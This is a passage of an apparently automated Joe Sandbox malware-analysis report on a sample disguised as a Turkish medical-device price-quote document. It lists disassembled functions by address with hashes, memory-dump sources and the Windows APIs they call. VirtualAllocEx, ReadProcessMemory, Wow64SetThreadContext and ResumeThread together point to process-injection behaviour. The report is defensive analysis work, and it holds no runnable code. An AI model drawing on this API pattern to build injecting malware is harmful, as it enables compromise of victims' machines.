                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: b59640cb42e48ab9a560a014ebfd9b271c2931d5170d6f4b2e811ebaf0ebb692
                                                                                                    • Instruction ID: 4fc9abfaaff4b8bc7e6dacc02cc196c006684d124b9c52734deca6066f6f5d18
                                                                                                    • Opcode Fuzzy Hash: b59640cb42e48ab9a560a014ebfd9b271c2931d5170d6f4b2e811ebaf0ebb692
                                                                                                    • Instruction Fuzzy Hash: 8821E5B5900309DFDB10CF9AD584ADEBBF4FB48320F14845AE918A3350D374A950CFA4
                                                                                                    Function 00F1D7C0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1194 f1d7c0-f1d85c DuplicateHandle 1195 f1d865-f1d882 1194->1195 1196 f1d85e-f1d864 1194->1196 1196->1195
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D78E,?,?,?,?,?), ref: 00F1D84F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 62286d786def5fdd4aaa26f27076b32d999532a731209e635fb7bca4cb298078
                                                                                                    • Instruction ID: caea2b10aec51975611d86f2c1704761a304e24276a99f6c73d7ff2eee18fc39
                                                                                                    • Opcode Fuzzy Hash: 62286d786def5fdd4aaa26f27076b32d999532a731209e635fb7bca4cb298078
                                                                                                    • Instruction Fuzzy Hash: 0B2103B5D00249AFDB10CFAAD884ADEBFF4FF48324F14801AE918A7211D374A951CFA0
                                                                                                    Function 07745448 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1199 7745448-7745493 1203 7745495-77454a1 1199->1203 1204 77454a3-77454d3 Wow64SetThreadContext 1199->1204 1203->1204 1206 77454d5-77454db 1204->1206 1207 77454dc-774550c 1204->1207 1206->1207
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077454C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 4d8a0adce089f325fdc438de2b2f41ae6ee58b523cbda618e4456dbf1137727d
                                                                                                    • Instruction ID: 6bf68e23aee72cb586f1a3e05e0c37738d70f7319dbaf6754cc20e23c73cbdb4
                                                                                                    • Opcode Fuzzy Hash: 4d8a0adce089f325fdc438de2b2f41ae6ee58b523cbda618e4456dbf1137727d
                                                                                                    • Instruction Fuzzy Hash: F22129B1D003099FDB10DFAAC4857EEBBF4EF88324F248429D519A7240DB78A954CFA5
                                                                                                    Function 077456D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07745750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 4fc07b2c2e2ab6e4784ffe5e5a3fa3d71a228b27c171d0393c2be01300851fd1
                                                                                                    • Instruction ID: 7d5cee0e7d9ed2c5dc532e5cfb175d9cc118d8895526bc21e11b9d6c5b3365d3
                                                                                                    • Opcode Fuzzy Hash: 4fc07b2c2e2ab6e4784ffe5e5a3fa3d71a228b27c171d0393c2be01300851fd1
                                                                                                    • Instruction Fuzzy Hash: 4F2125B1800349DFDB10DFAAC881BEEBBF5FF48320F10842AE518A7250C7789910CBA4
                                                                                                    Function 07745519 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0774558E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: f7a04318b04e5b636f215f5463cfb7e8764649239dfeabfb38cd017b24789d50
                                                                                                    • Instruction ID: 5a3569c9f0f88af6c4203aef6823a421b455c538c44d83669bdda4c63abc9fe3
                                                                                                    • Opcode Fuzzy Hash: f7a04318b04e5b636f215f5463cfb7e8764649239dfeabfb38cd017b24789d50
                                                                                                    • Instruction Fuzzy Hash: 64215B729043499FDF10CFA9C845AEEFFF6AF49320F248819E555A7250C7759510CFA1
                                                                                                    Function 07745390 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 4f73a1bb61772dd53216a723a2358f243efa067373ed8fb60cc1d41101b0b525
                                                                                                    • Instruction ID: baad790a00b3a9a964900366c7c3bcbdbc75e4e85152c83dcb9525c87fd22eca
                                                                                                    • Opcode Fuzzy Hash: 4f73a1bb61772dd53216a723a2358f243efa067373ed8fb60cc1d41101b0b525
                                                                                                    • Instruction Fuzzy Hash: EE11ACB18043898FDB20DFAAC44579EFFF4AF88324F24885ED119A7290C7B56540CBA4
                                                                                                    Function 07745520 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0774558E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: ec6c3fa43a5bfebf085e9a4441bb2f3ee0f5fdf7c616fd5ce300052b8f2c3c79
                                                                                                    • Instruction ID: 70a649196dd07e8fb3695a6f142621c01a1f3237283d50cfefdc7e6bfd958e80
                                                                                                    • Opcode Fuzzy Hash: ec6c3fa43a5bfebf085e9a4441bb2f3ee0f5fdf7c616fd5ce300052b8f2c3c79
                                                                                                    • Instruction Fuzzy Hash: CF1126729003499FDB10DFAAC845BEEBBF5EF88320F248819E519A7250C775A950CBA0
                                                                                                    Function 07748CD9 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07748D3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: dbad04a1de5292ceaa3fbc2c07c6ffc330433dfb5b68ffbdfed13adb0fe26453
                                                                                                    • Instruction ID: 97c2524ec0bf574d90e95659a4221280e7800806a25331f7215cd66869248c2a
                                                                                                    • Opcode Fuzzy Hash: dbad04a1de5292ceaa3fbc2c07c6ffc330433dfb5b68ffbdfed13adb0fe26453
                                                                                                    • Instruction Fuzzy Hash: 5C1113B18003499FDB10CF99C549BEEBFF8FB49364F20885AE518A7250C3B5A554CFA1
                                                                                                    Function 07745398 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 3f24677c2f7aed5b23ad6e79c2e3f3734eeaf2be1b3a636973e49b88b8d0bf37
                                                                                                    • Instruction ID: 313d1d4b67342e6f940253fc72dea0393c38f791af7204192a62d246156dc200
                                                                                                    • Opcode Fuzzy Hash: 3f24677c2f7aed5b23ad6e79c2e3f3734eeaf2be1b3a636973e49b88b8d0bf37
                                                                                                    • Instruction Fuzzy Hash: 97113AB19003498FDB10DFAAC44579FFBF4EF88724F248829D519A7250CB756544CBA4
                                                                                                    Function 00F1B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00F1B566
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 23404619c805d198d5d0faa1124831e5dedc7ee3b8ea5cdd11bbcf9138e668f8
                                                                                                    • Instruction ID: 9f84d19fdf749fd7560f1b55d5e4dce46d528431335b131e95bfa67817990f47
                                                                                                    • Opcode Fuzzy Hash: 23404619c805d198d5d0faa1124831e5dedc7ee3b8ea5cdd11bbcf9138e668f8
                                                                                                    • Instruction Fuzzy Hash: 6211DFB6C00749CFDB10CF9AC444ADEFBF5AB88724F14842AD519A7210D3B9A545CFA1
                                                                                                    Function 077426C4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07748D3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: fba83a018ed6b736e8ed3c369a8e9f45b7a3dd10ed9a59129bd8254b10929f09
                                                                                                    • Instruction ID: c7a58b4cefba615eaad9d97b26e5b7ac997b4960aeb868a0680c6210350d63fb
                                                                                                    • Opcode Fuzzy Hash: fba83a018ed6b736e8ed3c369a8e9f45b7a3dd10ed9a59129bd8254b10929f09
                                                                                                    • Instruction Fuzzy Hash: AD11F5B580034D9FDB10DF99C545BDEBBF8FB48360F10845AE518A7210C375A954CFA1
                                                                                                    Function 075C778F Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %*&/)(#$^@!~-_
                                                                                                    • API String ID: 0-3325533558
                                                                                                    • Opcode ID: 15f2705758bed41ac47031217ca23469e2ea7a3aac91bf17a30092662d648f04
                                                                                                    • Instruction ID: f930482f53da15a8b378c365b1a27d76e5ca8730c1001b3ff44fef2f3403ee1e
                                                                                                    • Opcode Fuzzy Hash: 15f2705758bed41ac47031217ca23469e2ea7a3aac91bf17a30092662d648f04
                                                                                                    • Instruction Fuzzy Hash: E171F030B042449FD705AB68D855AAEBBB2FF89300F0489EAD8859F387CF755D49CB91
                                                                                                    Function 075C77C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %*&/)(#$^@!~-_
                                                                                                    • API String ID: 0-3325533558
                                                                                                    • Opcode ID: a2615b5737634528c8de83ef5591139483d159b9c361bb021979b09888ae153e
                                                                                                    • Instruction ID: e47294d86119ec03c392d047b91a2eb2f72769b416f66041a8c8137d864152ce
                                                                                                    • Opcode Fuzzy Hash: a2615b5737634528c8de83ef5591139483d159b9c361bb021979b09888ae153e
                                                                                                    • Instruction Fuzzy Hash: D761BF34B001059FD704AB64D455AAEBBB2FFC8300F1489A9E9855F386CF75AE45CBD1
                                                                                                    Function 075C839F Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8
                                                                                                    • API String ID: 0-4194326291
                                                                                                    • Opcode ID: 536d8810eb273630943befcf9b472631c9811f82cfd8bb22f33b742492a3b937
                                                                                                    • Instruction ID: 88eb037ee7950312ea0df8710fc34722eae4113e6761a8459f5159fd66afce0e
                                                                                                    • Opcode Fuzzy Hash: 536d8810eb273630943befcf9b472631c9811f82cfd8bb22f33b742492a3b937
                                                                                                    • Instruction Fuzzy Hash: 7D01FEB0740249DFE714D6A8DC267D93771BB40704F194CABD9069F681EAF4AD90C791
                                                                                                    Function 075C6D20 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: G
                                                                                                    • API String ID: 0-985283518
                                                                                                    • Opcode ID: 3695b7568e8642bbb53f08d232fbad616937a838a1ae5fdc26cc061ed8de5106
                                                                                                    • Instruction ID: 393fb45450b16676a18b5a4449b8bbff0865533536275c9e9c79eb4c627ba4e3
                                                                                                    • Opcode Fuzzy Hash: 3695b7568e8642bbb53f08d232fbad616937a838a1ae5fdc26cc061ed8de5106
                                                                                                    • Instruction Fuzzy Hash: 99D017B211E2489FC341CEA0FE262F8BBB8D703231F0415D7D8098A946CE2A1F509692
                                                                                                    Function 075C6D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: G
                                                                                                    • API String ID: 0-985283518
                                                                                                    • Opcode ID: 9739f1eb600e2e51d9faa1a4feb08dca2074a9fcf69bf6ca671b43dd73d7ba32
                                                                                                    • Instruction ID: 7ff17f8eb354ea38161baa011a10e661690b09325d2f1fd6cd0d8fa4f72b04cc
                                                                                                    • Opcode Fuzzy Hash: 9739f1eb600e2e51d9faa1a4feb08dca2074a9fcf69bf6ca671b43dd73d7ba32
                                                                                                    • Instruction Fuzzy Hash: C0C012F0408108EBC644DE90EA0A6BCB7BCE702310F0004A8D80E46204CB351F20AA82
                                                                                                    Function 07420040 Relevance: .7, Instructions: 749COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d7e29511a45960dcaa960c7a50df4a553ae1a2b06916babadf4d5175ebcae3ff
                                                                                                    • Instruction ID: 29401d54b7a7694712449d2988a8cffb2970b26427f19fe057add485421467a4
                                                                                                    • Opcode Fuzzy Hash: d7e29511a45960dcaa960c7a50df4a553ae1a2b06916babadf4d5175ebcae3ff
                                                                                                    • Instruction Fuzzy Hash: 7662F5F0D01B528AD7745FF484987EEBEE1AB41309FA04A1FD1AACA360DB349493DB45
                                                                                                    Function 0742C5F0 Relevance: .5, Instructions: 523COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cd42927545727ffd6c3c958f3e434eb3cff24e8073c5b9d8354df608ebbc1435
                                                                                                    • Instruction ID: 1389b1b7f5f5de64c355a6256718232ab0afacba702a768bfc0950718f366709
                                                                                                    • Opcode Fuzzy Hash: cd42927545727ffd6c3c958f3e434eb3cff24e8073c5b9d8354df608ebbc1435
                                                                                                    • Instruction Fuzzy Hash: 1B420470D10619CFCF14EFA8C8846DCBBB1BF49300F51869AD5497B265EB309AA9CF91
                                                                                                    Function 0742C5E0 Relevance: .5, Instructions: 521COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5abe58c4e8009666884b386ee3671a73926e4bafc2a0c8537c4f947feafcf09
                                                                                                    • Instruction ID: a8f9ec7d94f982bea022ba9d723d3bf4556d25f04abfcf6b79cd5db93a8208ae
                                                                                                    • Opcode Fuzzy Hash: e5abe58c4e8009666884b386ee3671a73926e4bafc2a0c8537c4f947feafcf09
                                                                                                    • Instruction Fuzzy Hash: 89420570D10619CFCF14EFA8C8846DCBBB1BF49300F51869AD5497B265EB309AA9CF91
                                                                                                    Function 075C3478 Relevance: .5, Instructions: 460COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9ea04c372c1e4a821394e2e8ff682ad5a62358459672abf1aa8536c4b268f96
                                                                                                    • Instruction ID: 10fc4264f720c29b332196fb573664b6aaa624d580b91a34725c75f73c9edb41
                                                                                                    • Opcode Fuzzy Hash: c9ea04c372c1e4a821394e2e8ff682ad5a62358459672abf1aa8536c4b268f96
                                                                                                    • Instruction Fuzzy Hash: 81D1CFF0B0120ADFDB15EBA4C5496EEBFF1FF85200F5184AED442A72A5D630C865CB82
                                                                                                    Function 0742003F Relevance: .4, Instructions: 445COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78536f3a5deb86c196fd76d0f48a68dfc91b6094e68bae34f06f9c998f536015
                                                                                                    • Instruction ID: 72bd87965381a8d2f8380c0b28438f0e38699747ea5c78969d05d4f08348417d
                                                                                                    • Opcode Fuzzy Hash: 78536f3a5deb86c196fd76d0f48a68dfc91b6094e68bae34f06f9c998f536015
                                                                                                    • Instruction Fuzzy Hash: BB1238F0905B538AD6745BE485883EFFAD0AB05309FB04A1BC0FA8A365D73590D7EB49
                                                                                                    Function 07429738 Relevance: .3, Instructions: 341COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 91fe23ea31f2a576d02c43968b60b46a1f17cbfecb2dab994ae0d0027530b55d
                                                                                                    • Instruction ID: fa20c18fd420a1f190393c97601b17b895d673ef4933268e266cf8281188bc47
                                                                                                    • Opcode Fuzzy Hash: 91fe23ea31f2a576d02c43968b60b46a1f17cbfecb2dab994ae0d0027530b55d
                                                                                                    • Instruction Fuzzy Hash: D6B1CEB0E04219CFDB21EFA5C8546EEFBF6FF89300F60456AC505A7241EB319962DB52
                                                                                                    Function 075C0480 Relevance: .3, Instructions: 332COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2e463443783a10c450c29c066f5a4bd71713c162ceaf12f955b0ee7cf05c6a57
                                                                                                    • Instruction ID: c8ac3ece997b1811441455cf9134a464d9c5950f629246e83f36a4a81aaddf76
                                                                                                    • Opcode Fuzzy Hash: 2e463443783a10c450c29c066f5a4bd71713c162ceaf12f955b0ee7cf05c6a57
                                                                                                    • Instruction Fuzzy Hash: CAF1B675D1061ACFCB10DFA8C894AEDB7B5FF48310F1086A9D54AB7254EB70AA85CF90
                                                                                                    Function 075C0471 Relevance: .3, Instructions: 306COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d13c47a0b9d5aef6a12bb571aae9d8b5509751dc1de5219337e20d304ddfa778
                                                                                                    • Instruction ID: 3d48f89b54733bea0e3977e9f07603b65243fa4a77beb95f0c28b7bccdb06d01
                                                                                                    • Opcode Fuzzy Hash: d13c47a0b9d5aef6a12bb571aae9d8b5509751dc1de5219337e20d304ddfa778
                                                                                                    • Instruction Fuzzy Hash: B0E1B875D1061ACFCB10DFA4C854AEDB7B5FF48310F1086A9D54AB7254EB70AA85CF90
                                                                                                    Function 07427D60 Relevance: .3, Instructions: 291COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 758719d50f4af63437269c03d54ac2c58590d69c2d3632b017198dd09647cf5b
                                                                                                    • Instruction ID: e422e7bbe394712423917de1cc2c5ad5c30e78d62b0bf4f99c1140e034fb8716
                                                                                                    • Opcode Fuzzy Hash: 758719d50f4af63437269c03d54ac2c58590d69c2d3632b017198dd09647cf5b
                                                                                                    • Instruction Fuzzy Hash: FAB148B4A10225CFDB14DF69C854AAEBBF6BF89700F5540AAE505EB3A1CB30DC42DB50
                                                                                                    Function 075C2AC7 Relevance: .2, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
